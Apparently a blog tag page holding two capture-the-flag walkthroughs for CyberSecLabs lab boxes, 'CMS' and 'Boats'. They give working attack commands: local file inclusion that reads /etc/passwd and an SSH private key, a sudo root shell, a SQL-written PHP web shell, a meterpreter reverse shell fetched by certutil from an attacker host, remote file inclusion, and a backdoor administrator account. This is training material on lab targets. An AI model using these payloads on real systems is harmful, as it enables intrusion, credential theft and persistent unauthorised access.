Tag: WordPress

CyberSecLabs – “CMS” Walkthrough

CyberSecLabs

CMS from CyberSecLabs is a beginner level box hosting a WordPress installation. Using a file inclusion vulnerability we’ll gain access to the target, and exploit weak sudo permissions to escalate to root.

Let’s get started.

The IP Address for CMS is 172.31.1.8

Scanning and Enumeration

As always we run our Nmap scan against the target with -sC for default scripts, -sV for enable service enumeration, -p- to scan all TCP ports.

nmap -sC -sV -p- 172.31.1.8

Only two open ports on the target. Port 22 running SSH and port 80 hosting a HTTP web server. When we see this on a pentest or capture the flag, port 80 is almost always the initial entry point.

Next, I’ll run Nitko against the target to scan the web server.

nikto -h 172.31.1.8

Nothing actionable here other than confirming a WordPress installation. Let’s move on to directory busting.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.8

Again, we don’t find anything interesting, other than a couple WordPress pages.

Nikto and Gobuster didn’t provide us with any actionable information. We need to dig deeper and enumerate the web server. Which happens to be a WordPress site, let’s use….

WPScan – WordPress Security Scanner

WPScan is a WordPress vulnerability scanner that helps enumerate plugins, themes, and other information about WordPress installations. Let’s run this against the target web server.

WPScan with default options will generate a list of theme’s, and plugins to enumerate. It also points out which versions are out of date.

Here we see a plugin identified. I’m not familiar with this specific plugin, so I’ll do a quick Searchsploit to see if it has any known vulnerabilities.

wpscan –url 172.31.1.8

Searchsploit will search the local Exploit-DB repository on your Linux box. Provided you’ve updated the Searchsploit database, what you see here are the same results you’ll find on the Exploit-DB website.

We find an exploit for the WP with Spritz plugin. Our version also matches, so now we have a vulnerability to exploit.

searchsploit -w wp with spritz

Exploitation

We have a vulnerable WordPress plugin named WP-with-Spritz. Our exploit is a Remote File Inclusion vulnerability as stated in the title. However, if you look at the code we have two working POC’s. One Remote file inclusion, and one for Local file inclusion. Which one do we use to exploit?

File Inclusion Vulnerabilities

LFI or Local File Inclusion vulnerabilities allow the attacker to read and sometimes execute files on the target machine.

RFI or Remote File Inclusion vulnerabilities are easier to exploit but less common. Instead of accessing a file on the target system, the attacker is able to execute code hosted on their own machine.

Now we’ve got a primer on file inclusion vulnerabilities so let’s continue. Essentially, we’re manipulating the URL address into displaying local files on the target. The POC provided in the exploit will grab the /etc/passwd file. Since this file is readable by all users on a Linux system, this is a great way to test the vulnerability.

I navigate to the following URL and then right click and select “View Source”. This will provide the formatting associated with the file.

http://172.31.1.8//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

http://172.31.1.8//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Pause for a moment and think back to our initial Nmap scan. Two ports open. One is the web server, and the other is SSH. That means we could probably find a user with a private key that might allow us to connect to the target over SSH.

On a Linux system private SSH keys are stored in the user’s home folder under .ssh. If we peak at the /etc/passwd file you notice the only other user account besides root is the “angel” account. That’s our user.

Modify our URL address path to /home/angel/.ssh/id_rsa in your browser and go. Again to format the file, right click and select “View Source”.

http://172.31.1.8//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa

Copy the private key into a file named id_rsa. Then chmod on the file to allow us to execute it.

Now we’ll use the private key inside the id_rsa file to connect to the target over SSH as the angel user.

chmod 700 id_rsa
ssh -i id_rsa angel@172.31.1.8

Success! We are now logged into the target as Angel.

Privilege Escalation

You’ve gained access to a Linux system as a low privileged user. What’s the first thing you do?

Check Sudo Permissions. The easiest and quickest win on a Linux system can be found by running Sudo -L.

This will show you what commands can be run under the Root account without a password, by the current user.

sudo -l

This is the holy grail for Sudo permissions. If you ever find a user who can run (ALL : ALL) NOPASSWD: ALL, you can immediately own that box and become root.

Again, whatever command we run will be run under the Root account. All we have to do is spawn a bin/bash shell as the root user. Boom. Done. It’s that easy.

sudo -l
sudo /bin/bash

Capture the flags!

Don’t forget to capture your flags and complete the box.

cat /home/angel/access.txt
cat /root/system.txt

That is CMS from CyberSecLabs. An excellent beginner box that demonstrates how to exploit a file inclusion vulnerability to gain initial access to the target. Once we got our low privileged user, we used a simple Sudo command to spawn a root shell. Always, always, always check those Sudo permissions. That is easiest and quickest way to score a win on Linux.

CyberSecLabs – “Boats” Walkthrough

CyberSecLabs

Boats from CyberSecLabs is a beginner Windows box hosting a web server. I’ll demonstrate two different methods of exploitation. First we exploit a insecure phpMyAdmin install, and second we take advantage of a WordPress plugin Remote File Inclusion vulnerability.

Boats IP address is 172.31.1.14.

Scanning

I start with a Nmap scan running default scripts with service enumeration enabled for all 65,535 TCP ports.

nmap -sC -sV -p- 172.31.1.14

Multiple ports open. There’s a Apache web server on port 80. SMB on 445, and a few high level ports hosting HTTP services.

Enumeration

First we want to check out the web server on port 80. I see a WordPress blog apparently dedicated to the author’s love of… Boats. Cool. Not much going on here.

172.31.1.14 – A blog dedicated to Boats!

Let’s dig into this WordPress blog and see what’s hiding behind the front end web page. I run Gobuster with the big.txt wordlist to find hidden directories.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.14

We see several potentially interesting directories. Gobuster revealed a phpMyAdmin directory. If we browse to 172.31.1.14/phpmyadmin we find no password is required and we have full access to Phpmyadmin.

172.31.1.14/phpmyadmin/

Exploitation Route #1 – phpMyAdmin

We have phpMyAdmin access but what can we do with it? If you aren’t familiar with phpMyAdmin, what is is, or how to exploit it. Start with a google search for something like phpMyAdmin reverse shell. Check out the second link from Hacking Articles.

Google Search Results

If you scroll down into the article there’s a malicious SQL query that can be executed to create a web shell vulnerability on the web server.

The SQL query creates a file called backdoor.php which contains the php code for a standard web shell. This allows Windows commands to be executed inside the web browser and display the output on the web page.

SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

Navigate to the backdoor.php file. To interact with the php web shell add a command to the URL. If you haven’t encountered a web shell before, you can add windows commands to be executed after cmd= in the URL and the output will be displayed on the web page.

172.31.1.14/backdoor.php?cmd=dir

That confirms our webshell is working. We see the contents of the htdocs folder.

I do a “whoami” command and see that I already have NT Authority\System access. I could capture the flags from the browser if I wanted to.

172.31.1.14/backdoor.php?cmd=whoami

The web shell is great for initial access and in this case you could capture the flags and be done with this box since no privilege escalation is required. However, let’s go one step further and upgrade the web shell to a meterpreter session. Upgrading your current shell to a better one is a concept that comes up often in CTFs and pentesting. You’ll want to get a good handle on this, so always practice when you can.

I create a Meterpreter reverse TCP shell payload with msfvenom with the file type of a windows executable.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.41 LPORT=1234 -f exe > shell.exe

Host the file with python http.server so we can transfer it to the target. This creates a simple web server in the directory of your choosing that hosts the files on the network so we can access them on the target.

python3 -m http.server 80

My favorite built-in windows file transfer method is using Certutil . I execute this command in the web shell and the file is transferred to the target.

172.31.1.14/backdoor.php?cmd=certutil -urlcache -split -f http://10.10.0.41/shell.exe shell.exe

Setup a Metasploit multi handler to receive the reverse shell. Finally execute the reverse shell payload by launching the executable from the browser.

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.41
set LPORT 1234
run
getuid

Exploitation Route #2 – WordPress Plugin

Since that was a quick win let’s explore another attack vector present that we’ve already discovered during our enumeration phase. The WordPress blog.

I’m going to use a tool called CMSmap to enumerate the WordPress installation. Another option would be a WPScan.

I run CMSmap against the URL address which in this case is the base web directory. The -F switch enables a full scan.

CMSMap results
./cmsmap.py http://172.31.1.14 -F

In the CMSmap results I see TheCartPress plugin has a Remote File Inclusion vulnerability. Bingo. CMSmap doesn’t provide a link to the exploit, so I’ll look it up in the Exploit-Database using Searchsploit.

searchsploit cartpress

If you take a look at the exploit it provides a URL within the CartPress plugin directory that is vulnerable to remote file inclusion. This means we can host a file on our attack machine that will be executed on the target.

POC
http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFIPATH

We have our Remote file inclusion vulnerability, but now what we need a file that will serve as a web shell. Search google for “remote file inclusion shell github”. The first result is an excellent php based RFI shell by Namam Sahore. This will suit our purposes perfectly.

Google Search – remote file inclusion shell github

Download or place a copy of the knock.txt file on your attack machine.

We need to host the knock.txt file so the web server can access it remotely. I’ll use the http.server python3 module.

Now in your browser add the path to the knock.txt file which includes the IP Address of your attack machine. For example the path to access knock.txt on my machine would be http://10.10.0.41/knock.txt. Hit Enter and load the web page.

You’ll see right away we have a HTTP request for the knock.txt file from the target 172.31.1.14.

python3 -m http.server 80

Back in the browser, you’ll notice we have a basic web page with an option to issue commands and create a reverse php shell.

To use the web shell simply enter a command and hit CMD. From here we could use the same method to get a meterpreter reverse shell or we could capture the flags and be done.

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.41/knock.txt

From here you could use the same process to create a reverse shell payload and transfer it to the target. To keep things short I won’t explain the process again.

Post-Exploitation

Normally we’d capture the flags and be done but let’s go through this post-exploitation exercise. You can issue the follow commands from the web shell, however I’m working from my meterpreter prompt so I’ll spawn a shell from there.

The next two commands are simple but effective. First we create a new user for ourselves and second we add that user to the Local Administrators group.

net user outrunsec Outruns3c! /add
net localgroup administrators outrunsec /add

With the new outrunsec account created we can use Metasploit’s psexec module to get a reverse shell.

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set RHOSTS 172.31.1.14
set LHOST 10.10.0.41
set SMBUser outrunsec
set SMBPass Outruns3c!
run
getuid

Capture the Flags!

Once again I’ll drop into a command shell and capture the flags.

type “C:\Users\james\Desktop\access.txt”
type “C:\Users\Administrator\Desktop\system.txt”

There you have it two different routes for Boats from CyberSecLabs! Both exploiting different vulnerabilities to get a web shell as the NT AUTHORITY/SYSTEM user. The concepts shown here web exploitation, upgrading a shell, and creating persistence on the machine for easier repeat access are ideas that will keep coming up while pentesting.